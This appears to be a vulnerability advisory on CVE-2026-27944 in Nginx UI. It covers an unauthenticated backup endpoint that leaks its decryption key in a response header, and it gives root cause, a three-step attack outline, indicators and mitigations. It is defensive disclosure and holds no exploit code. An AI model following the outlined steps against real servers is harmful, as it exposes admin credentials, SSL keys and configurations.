Key Findings

• A critical vulnerability in Nginx UI, tracked as CVE-2026-27944, allows attackers to download and decrypt full server backups without authentication.

• The vulnerability stems from two major flaws: the /api/backup endpoint lacks authentication, and the server exposes the AES-256 encryption key and IV in an HTTP response header.

• Exploitation of the vulnerability could have serious consequences as a full Nginx UI backup contains large amounts of sensitive operational data, including admin credentials, session tokens, private SSL keys, database credentials, and Nginx configurations.

Background

Nginx UI is a web-based management dashboard designed to simplify the administration of Nginx servers. Instead of configuring Nginx through command-line files, administrators can use a graphical interface to manage servers, monitor performance, and update configurations.

Technical Details

Vulnerability Analysis

The vulnerability stems from a Missing Authentication for Critical Function (CWE-306) in Nginx UI's backup functionality. The /api/backup endpoint fails to implement proper authentication checks, allowing any network-accessible attacker to request system backups without providing valid credentials.

Compounding this authentication bypass, the application includes the encryption keys necessary to decrypt the backup directly in the HTTP response header X-Backup-Security. This design flaw completely undermines the purpose of encrypting the backup data, as the decryption key is transmitted alongside the encrypted content.

Root Cause

The root cause is the absence of authentication middleware on the /api/backup API endpoint. Critical administrative functions like backup creation and download should require authenticated administrative access. Additionally, the architectural decision to include decryption keys in response headers represents a fundamental cryptographic design flaw, as it negates any security benefit from encrypting the backup data.

Attack Vector

The attack is network-based and requires no authentication or user interaction. An attacker with network access to the Nginx UI management interface can exploit this vulnerability by:

1. Accessing the /api/backup endpoint without authentication

2. Extracting the decryption key from the X-Backup-Security response header

3. Downloading and immediately decrypting the full system backup

Detection and Mitigation

Indicators of Compromise

• Requests to the /api/backup endpoint without valid authentication

• Presence of the X-Backup-Security response header containing the decryption key

Mitigation

• Upgrade to Nginx UI version 2.3.3 or later, which addresses the vulnerability

• As a temporary workaround, block access to the /api/backup endpoint using firewall rules

Conclusion

The CVE-2026-27944 vulnerability highlights the importance of securing management interfaces and applying the principle of least privilege. Organizations should restrict access to Nginx UI and similar tools to authorized users and networks, and regularly review APIs and admin endpoints for potential security gaps.

Sources

• https://securityaffairs.com/189123/security/critical-nginx-ui-flaw-cve-2026-27944-exposes-server-backups.html

• https://www.sentinelone.com/vulnerability-database/cve-2026-27944/